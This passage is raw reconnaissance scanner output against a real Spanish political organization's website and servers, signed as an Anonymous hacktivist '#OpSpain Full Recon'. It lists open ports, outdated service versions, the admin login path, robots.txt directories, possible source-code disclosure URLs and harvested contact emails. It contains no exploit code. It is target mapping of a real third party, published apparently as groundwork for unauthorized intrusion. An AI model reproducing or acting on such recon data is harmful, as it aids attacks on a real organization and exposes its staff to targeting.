3074. [*] Import: Parsing with 'Nokogiri v1.8.5'
3075. [*] Importing host 91.121.2.184
3076. [*] Successfully imported /usr/share/sniper/loot/91.121.2.184/nmap/nmap-91.121.2.184.xml
3077.  
3078. Hosts
3079. =====
3080.  
3081. address mac name os_name os_flavor os_sp purpose info comments
3082. ------- --- ---- ------- --------- ----- ------- ---- --------
3083. 91.121.2.184 Linux 2.6.X server
3084. 195.55.47.89 Windows 3.X device
3085.  
3086. Services
3087. ========
3088.  
3089. host port proto name state info
3090. ---- ---- ----- ---- ----- ----
3091. 91.121.2.184 22 tcp ssh open OpenSSH 5.3 protocol 2.0
3092. 91.121.2.184 25 tcp smtp closed
3093. 91.121.2.184 53 udp domain unknown
3094. 91.121.2.184 67 udp dhcps unknown
3095. 91.121.2.184 68 udp dhcpc unknown
3096. 91.121.2.184 69 udp tftp unknown
3097. 91.121.2.184 80 tcp http open Apache httpd PHP 5.6.14
3098. 91.121.2.184 88 udp kerberos-sec unknown
3099. 91.121.2.184 123 udp ntp unknown
3100. 91.121.2.184 137 udp netbios-ns filtered
3101. 91.121.2.184 138 udp netbios-dgm filtered
3102. 91.121.2.184 139 tcp netbios-ssn closed
3103. 91.121.2.184 139 udp netbios-ssn unknown
3104. 91.121.2.184 161 udp snmp unknown
3105. 91.121.2.184 162 udp snmptrap unknown
3106. 91.121.2.184 389 tcp ldap open OpenLDAP 2.2.X - 2.3.X
3107. 91.121.2.184 389 udp ldap unknown
3108. 91.121.2.184 443 tcp ssl/http open Apache httpd PHP 5.6.14
3109. 91.121.2.184 445 tcp microsoft-ds closed
3110. 91.121.2.184 465 tcp ssl/smtps open
3111. 91.121.2.184 520 udp route unknown
3112. 91.121.2.184 993 tcp ssl/imaps open
3113. 91.121.2.184 2049 udp nfs unknown
3114. 91.121.2.184 7071 tcp ssl/iwg1 open
3115. 91.121.2.184 8080 tcp ssh open OpenSSH 5.3 protocol 2.0
3116. 195.55.47.89 25 tcp smtp closed
3117. 195.55.47.89 53 udp domain unknown
3118. 195.55.47.89 67 udp dhcps unknown
3119. 195.55.47.89 68 udp dhcpc unknown
3120. 195.55.47.89 69 udp tftp unknown
3121. 195.55.47.89 80 tcp http-proxy open Squid http proxy
3122. 195.55.47.89 88 udp kerberos-sec unknown
3123. 195.55.47.89 113 tcp ident closed
3124. 195.55.47.89 123 udp ntp unknown
3125. 195.55.47.89 137 udp netbios-ns filtered
3126. 195.55.47.89 138 udp netbios-dgm filtered
3127. 195.55.47.89 139 tcp netbios-ssn closed
3128. 195.55.47.89 139 udp netbios-ssn unknown
3129. 195.55.47.89 161 udp snmp unknown
3130. 195.55.47.89 162 udp snmptrap unknown
3131. 195.55.47.89 389 udp ldap unknown
3132. 195.55.47.89 443 tcp https open Microsoft-HTTPAPI/2.0
3133. 195.55.47.89 445 tcp microsoft-ds closed
3134. 195.55.47.89 520 udp route unknown
3135. 195.55.47.89 2049 udp nfs unknown
3136. =======================================================================================================================================
3137. #######################################################################################################################################
3138. [+] FireWall Detector
3139. [++] Firewall not detected
3140.  
3141. [+] Detecting Joomla Version
3142. [++] Joomla 3.8.10
3143.  
3144. [+] Core Joomla Vulnerability
3145. [++] Target Joomla core is not vulnerable
3146.  
3147. [+] Checking apache info/status files
3148. [++] Readable info/status files are not found
3149.  
3150. [+] admin finder
3151. [++] Admin page : http://falange-autentica.es/administrator/
3152.  
3153. [+] Checking robots.txt existing
3154. [++] robots.txt is found
3155. path : http://falange-autentica.es/robots.txt
3156.  
3157. Interesting path found from robots.txt
3158. http://falange-autentica.es/joomla/administrator/
3159. http://falange-autentica.es/administrator/
3160. http://falange-autentica.es/bin/
3161. http://falange-autentica.es/cache/
3162. http://falange-autentica.es/cli/
3163. http://falange-autentica.es/components/
3164. http://falange-autentica.es/includes/
3165. http://falange-autentica.es/installation/
3166. http://falange-autentica.es/language/
3167. http://falange-autentica.es/layouts/
3168. http://falange-autentica.es/libraries/
3169. http://falange-autentica.es/logs/
3170. http://falange-autentica.es/modules/
3171. http://falange-autentica.es/plugins/
3172. http://falange-autentica.es/tmp/
3173.  
3174.  
3175. [+] Finding common backup files name
3176. [++] Backup files are not found
3177.  
3178. [+] Finding common log files name
3179. [++] error log is not found
3180.  
3181. [+] Checking sensitive config.php.x file
3182. [++] Readable config files are not found
3183.  
3184. [+] FireWall Detector
3185. [++] Firewall not detected
3186.  
3187. [+] Detecting Joomla Version
3188. [++] Joomla 3.8.10
3189.  
3190. [+] Core Joomla Vulnerability
3191. [++] Target Joomla core is not vulnerable
3192.  
3193. [+] Checking apache info/status files
3194. [++] Readable info/status files are not found
3195.  
3196. [+] admin finder
3197. [++] Admin page : http://falange-autentica.es/administrator/
3198.  
3199. [+] Checking robots.txt existing
3200. [++] robots.txt is found
3201. path : http://falange-autentica.es/robots.txt
3202.  
3203. Interesting path found from robots.txt
3204. http://falange-autentica.es/joomla/administrator/
3205. http://falange-autentica.es/administrator/
3206. http://falange-autentica.es/bin/
3207. http://falange-autentica.es/cache/
3208. http://falange-autentica.es/cli/
3209. http://falange-autentica.es/components/
3210. http://falange-autentica.es/includes/
3211. http://falange-autentica.es/installation/
3212. http://falange-autentica.es/language/
3213. http://falange-autentica.es/layouts/
3214. http://falange-autentica.es/libraries/
3215. http://falange-autentica.es/logs/
3216. http://falange-autentica.es/modules/
3217. http://falange-autentica.es/plugins/
3218. http://falange-autentica.es/tmp/
3219.  
3220.  
3221. [+] Finding common backup files name
3222. [++] Backup files are not found
3223.  
3224. [+] Finding common log files name
3225. [++] error log is not found
3226.  
3227. [+] Checking sensitive config.php.x file
3228. [++] Readable config files are not found
3229. #######################################################################################################################################
3230. | Check robots.txt:
3231. | [+] # If the Joomla site is installed within a folder such as at
3232. | [+] # e.g. www.example.com/joomla/ the robots.txt file MUST be
3233. | [+] # moved to the site root at e.g. www.example.com/robots.txt
3234. | [+] # AND the joomla folder name MUST be prefixed to the disallowed
3235. | [+] # path, e.g. the Disallow rule for the /administrator/ folder
3236. | [+] # MUST be changed to read Disallow: /joomla/administrator/
3237. | [+] #
3238. | [+] # For more information about the robots.txt standard, see:
3239. | [+] # http://www.robotstxt.org/orig.html
3240. | [+] #
3241. | [+] # For syntax checking, see:
3242. | [+] # http://tool.motoricerca.info/robots-checker.phtml
3243. | [+]
3244. | [+] User-agent: *
3245. | [+] Disallow: /administrator/
3246. | [+] Disallow: /bin/
3247. | [+] Disallow: /cache/
3248. | [+] Disallow: /cli/
3249. | [+] Disallow: /components/
3250. | [+] Disallow: /includes/
3251. | [+] Disallow: /installation/
3252. | [+] Disallow: /language/
3253. | [+] Disallow: /layouts/
3254. | [+] Disallow: /libraries/
3255. | [+] Disallow: /logs/
3256. | [+] Disallow: /modules/
3257. | [+] Disallow: /plugins/
3258. | [+] Disallow: /tmp/
3259. #######################################################################################################################################
3260. | External hosts:
3261. | [+] External Host Found: http://www.abc.es
3262. | [+] External Host Found: http://www.sepg.pap.minhap.gob.es
3263. | [+] External Host Found: http://hemeroteca.lavanguardia.com
3264. | [+] External Host Found: http://www.diezminutos.org
3265. | [+] External Host Found: http://www.salvador-dali.org
3266. | [+] External Host Found: http://www.educacion.gob.es
3267. | [+] External Host Found: http://www.lasprovincias.es
3268. | [+] External Host Found: http://www.lanacion.es
3269. | [+] External Host Found: http://disqus.com
3270. | [+] External Host Found: http://www.regiondigital.com
3271. | [+] External Host Found: http://www.elespanol.com
3272. | [+] External Host Found: http://www.elpais.com
3273. | [+] External Host Found: http://www.elmundo.es
3274. | [+] External Host Found: http://tribunadeljurista.foroes.net
3275. | [+] External Host Found: http://www.levante-emv.com
3276. | [+] External Host Found: http://www.elperiodico.com
3277. | [+] External Host Found: http://www.change.org
3278. | [+] External Host Found: http://diariorc.com
3279. | [+] External Host Found: http://www.hoy.es
3280. | [+] External Host Found: http://www.plataforma2003.org
3281. | [+] External Host Found: http://www.valenciaopinion.es
3282. | [+] External Host Found: https://www.lavanguardia.com
3283. | [+] External Host Found: http://azulmania.es
3284. | [+] External Host Found: http://laboro-spain.blogspot.co.uk
3285. | [+] External Host Found: http://soydecieza.laverdad.es
3286. | [+] External Host Found: http://elmunicipio.es
3287. | [+] External Host Found: http://guarena.hoy.es
3288. | [+] External Host Found: https://www.facebook.com
3289. | [+] External Host Found: http://www.20minutos.es
3290. | [+] External Host Found: http://www.aviladigital.com
3291. | [+] External Host Found: http://sociedad.elpais.com
3292. | [+] External Host Found: https://twitter.com
3293. | [+] External Host Found: https://www.elconfidencial.com
3294. | [+] External Host Found: http://www.libremercado.com
3295. | [+] External Host Found: http://www.aexe.es
3296. | [+] External Host Found: http://www.facebook.com
3297. | [+] External Host Found: http://www.rednatura2000.info
3298. | [+] External Host Found: http://www.eldigitaldecanarias.net
3299. | [+] External Host Found: http://elpais.com
3300. | [+] External Host Found: http://www.fundacionjoseantonio.es
3301. | [+] External Host Found: http://www.eleconomista.es
3302. | [+] External Host Found: http://&quot;tribunadeljurista.foroes.net
3303. | [+] External Host Found: http://www.attac.es
3304. | [+] External Host Found: http://www.radioguarena.com
3305. | [+] External Host Found: https://www.change.org
3306. | [+] External Host Found: http://www.defensasocial.es
3307. | [+] External Host Found: http://groups.msn.com
3308. | [+] External Host Found: http://www.extremadura.falange-autentica.org
3309. | [+] External Host Found: http://www.rumbos.net
3310. | [+] External Host Found: http://www.jccm.es
3311. | [+] External Host Found: http://www.lalinterna.com
3312. | [+] External Host Found: http://fundacionjoseantonio.es
3313. | [+] External Host Found: https://www.youtube.com
3314. | [+] External Host Found: http://www.phoca.cz
3315. | [+] External Host Found: http://www.diariodeavisos.com
3316. | [+] External Host Found: http://ecodiario.eleconomista.es
3317. | [+] External Host Found: http://www.ciezaenlared.com
3318. | [+] External Host Found: http://www.libertaddigital.com
3319. | [+] External Host Found: http://gallos-de-marzo.espacioblog.com
3320. | [+] External Host Found: http://www.articulo.org
3321. | [+] External Host Found: http://latribunadecartagena.com
3322. | [+] External Host Found: http://www.falange-autentica.org
3323. | [+] External Host Found: http://www.lavanguardia.com
3324. | [+] External Host Found: http://www.elespiadigital.com
3325. | [+] External Host Found: http://www.ine.es
3326. | [+] External Host Found: http://www.elperiodicodearagon.com
3327. | [+] External Host Found: http://www.ocu.org
3328. | [+] External Host Found: http://www.europapress.es
3329. | [+] External Host Found: http://www.diariosur.es
3330. | [+] External Host Found: http://sindicatount.es
3331. | [+] External Host Found: http://www.ingenierosdemontes.org
3332. | [+] External Host Found: http://img.youtube.com
3333. | [+] External Host Found: http://www.foessa.es
3334. | [+] External Host Found: http://www.hoyguarena.es
3335. | [+] External Host Found: http://eldiadigital.es
3336. | [+] External Host Found: http://ciezaenmovimiento.es
3337. | [+] External Host Found: http://canarias24horas.com
3338. | [+] External Host Found: http://www.forestales.net
3339. | [+] External Host Found: http://www.intereconomia.com
3340. | [+] External Host Found: http://www.miperiodicodigital.com
3341. | [+] External Host Found: http://www.radiohuesca.com
3342. | [+] External Host Found: http://www.euractiv.es
3343. | [+] External Host Found: http://elnuevorotativo.blogspot.com
3344. | [+] External Host Found: http://www.agorahispanica.es
3345. | [+] External Host Found: http://ec.europa.eu
3346. | [+] External Host Found: http://web.archive.org
3347. | [+] External Host Found: http://www.elmiradordecieza.com
3348. #######################################################################################################################################
3349. | Source Code Disclosure:
3350. | [+] Source Code Found: http://falange-autentica.es/imagenes/5-acto-publico-de-fa-en-alicante-2016/detail/191-dia-de-fa-en-alicante?tmpl=component&phocadownload=2
3351. | [+] Source Code Found: http://falange-autentica.es/imagenes/16-historia/detail/243-no-volem-solsament-canviar-de-govern-volem-canviar-la-vida?tmpl=component&phocadownload=2
3352. |
3353. | FCKeditor File Upload:
3354. |
3355. | E-mails:
3356. | [+] E-mail Found: n@falange-autentica.org
3357. | [+] E-mail Found: 2@t.2
3358. | [+] E-mail Found: 7m@i.d
3359. | [+] E-mail Found: comunicacion@falange-autentica.es
3360. | [+] E-mail Found: contactar@falange-autentica.es
3361. | [+] E-mail Found: y0@7.ty
3362. | [+] E-mail Found: canarias@falange-autentica.org
3363. =======================================================================================================================================
3364. ######################################################################################################################################
3365. Anonymous JTSEC #OpSpain Full Recon #2